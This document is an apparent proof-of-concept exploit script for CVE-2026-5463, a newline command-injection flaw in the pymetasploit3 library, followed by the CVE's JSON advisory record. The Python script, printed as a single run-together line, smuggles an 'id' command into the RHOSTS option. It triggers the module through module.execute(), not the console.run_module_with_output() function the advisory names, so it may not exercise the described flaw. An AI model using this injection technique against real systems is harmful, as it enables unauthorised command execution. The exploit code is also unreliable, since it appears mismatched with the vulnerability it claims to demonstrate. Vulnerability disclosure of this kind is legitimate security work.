CVE-2026-5463

# Proof of Concept for CVE-2026-5463 # This script demonstrates the command injection vulnerability # by injecting a newline character into the RHOSTS option. import pymetasploit3 as msf def main(): # Initialize the client connection to the Metasploit RPC server # Ensure the RPC service is running before executing try: client = msf.MsfRpcClient('your_password', port=55553, server='127.0.0.1') except Exception as e: print(f"Connection failed: {e}") return # Select a module to exploit (example: auxiliary/scanner/portscan/tcp) # The specific module is not critical; the focus is on option handling. try: module = client.modules.use('auxiliary', 'scanner/portscan/tcp') except Exception as e: print(f"Module loading failed: {e}") return # Construct the malicious payload # Injecting a newline character (\n) to break the command structure. # This causes the console to execute 'id' after setting RHOSTS. malicious_rhosts = "192.168.1.1\nid\n" print(f"[*] Injecting payload into RHOSTS: {repr(malicious_rhosts)}") # Set the vulnerable option module['RHOSTS'] = malicious_rhosts # Execute the module # The underlying console.run_module_with_output() will process the injection. print("[*] Executing module to trigger command injection...") module.execute() print("[+] Exploit attempt finished. Check the Metasploit console for 'id' output.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-5463", "sourceIdentifier": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "published": "2026-04-03T05:16:24.160", "lastModified": "2026-04-03T16:10:23.730", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerability in console.run_module_with_output() in pymetasploit3 through version 1.0.6 allows attackers to inject newline characters into module options such as RHOSTS. This breaks the intended command structure and causes the Metasploit console to execute additional unintended commands, potentially leading to arbitrary command execution and manipulation of Metasploit sessions."}], "metrics": {"cvssMetricV40": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}], "cvssMetricV2": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/DanMcInerney/pymetasploit3", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c"}, {"url": "https://pypi.org/project/pymetasploit3/", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c"}]}}